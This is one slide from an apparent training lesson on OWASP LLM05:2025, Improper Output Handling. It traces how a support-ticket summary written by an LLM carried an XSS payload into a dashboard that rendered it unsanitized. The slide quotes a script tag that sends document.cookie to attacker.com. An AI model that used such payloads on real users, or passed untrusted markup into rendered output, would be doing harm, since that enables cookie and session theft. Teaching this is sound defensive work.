LLM05:2025Improper Output Handling
Slide 2 of 27
Part 1 · What Is It?Slide 2
Slide 2 · What Just Happened
The LLM was a middleman. The browser was the target.
Let’s trace the exact failure.
Step 1 — Attacker Input

The attacker’s ticket contained: <script>fetch('https://attacker.com?c='+document.cookie)</script>

Just text. The LLM received it as part of the ticket context.

Step 2 — LLM Output

The LLM tried to summarize the ticket. It echoed the user’s text back in its response — including the script tag. From the model’s perspective, it was just summarizing. It had no idea the text was code.

Step 3 — Application Error

The dashboard application took the LLM’s response and inserted it into the page with innerHTML or a server-side template that didn’t HTML-encode the string. The browser parsed the response as HTML. It found a script tag. It ran it.

The Actual Bug

The application never asked: "Is this output safe to render as HTML?" It treated LLM output as trusted content. That’s the mistake. The LLM didn’t cause the XSS — the missing output sanitization did.

← BackNext → The official definition
📄 View sources for this lesson